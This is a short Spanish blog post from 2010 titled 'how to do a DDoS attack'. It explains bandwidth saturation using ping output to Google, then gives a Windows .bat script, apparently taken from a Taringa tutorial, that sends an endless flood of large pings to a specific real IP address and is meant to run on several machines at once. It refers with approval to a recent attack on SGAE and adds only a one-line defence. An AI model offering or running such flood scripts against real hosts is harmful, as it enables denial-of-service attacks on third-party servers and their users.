Mb Sistemas Informaticos: Como hacer un ataque DDoS


Nos hemos mudado a:

www.mbsistemasinformaticos.es


lunes, 11 de octubre de 2010

Como hacer un ataque DDoS

Un ataque DDoS consiste en saturar el ancho de banda del servidor atacado, de forma que los clientes legítimos que intenten acceder a el no lo encuentren disponible.

Ping es un comando que envia una señal a otro ordenador en red para saber si este está activo y en red. Este es un ejemplo de un ping normal a google.

ping www.google.esPING www.l.google.com (66.249.92.104) 56(84) bytes of data.64 bytes from par03s01-in-f104.1e100.net (66.249.92.104): icmp_seq=1 ttl=52 time=45.4 ms64 bytes from par03s01-in-f104.1e100.net (66.249.92.104): icmp_seq=2 ttl=52 time=59.5 ms64 bytes from par03s01-in-f104.1e100.net (66.249.92.104): icmp_seq=3 ttl=52 time=45.4 ms64 bytes from par03s01-in-f104.1e100.net (66.249.92.104): icmp_seq=4 ttl=52 time=44.1 ms--- www.l.google.com ping statistics ---4 packets transmitted, 4 received, 0% packet loss, time 3007msrtt min/avg/max/mdev = 44.102/48.649/59.553/6.320 ms

Si suficientes ordenadores hicieran ping a la vez, el ancho de banda de google se agotaría. Esta es la idea general de un ataque DDoS, por supuesto existen herramientas especificas para estas actividades, que entre otras cosas se emplean para saber que capacidad de respuesta tiene un servidor (amen de para hacer ataques como el del miércoles pasado a la SGAE)



Entendedme, he puesto a google solo como ejemplo porque todos lo conocemos, pero puede ser cualquier otro ordenador en red (servidor o no). Además de consumir ancho de banda, un ataque DDoS también consume CPU.

Un ejemplo de ataque DDoS de lo mas simple seria un archivo .bat con el siguiente contenido ejecutado en varias maquinas simultáneamente:

@echo off
echo DDOS ATTACK 1.0
echo —————
echo Tutorial Taringa
echo Ejemplo
echo —————
echo
ping 74.86.38.58 -t -l 15000
Por supuesto, hay maneras de defenderse de estos ataques, una buena defensa ante este ejemplo concreto, seria simplemente que el equipo atacado ignorara los comandos ping

FUENTES:

1 comentario:

Nota: solo los miembros de este blog pueden publicar comentarios.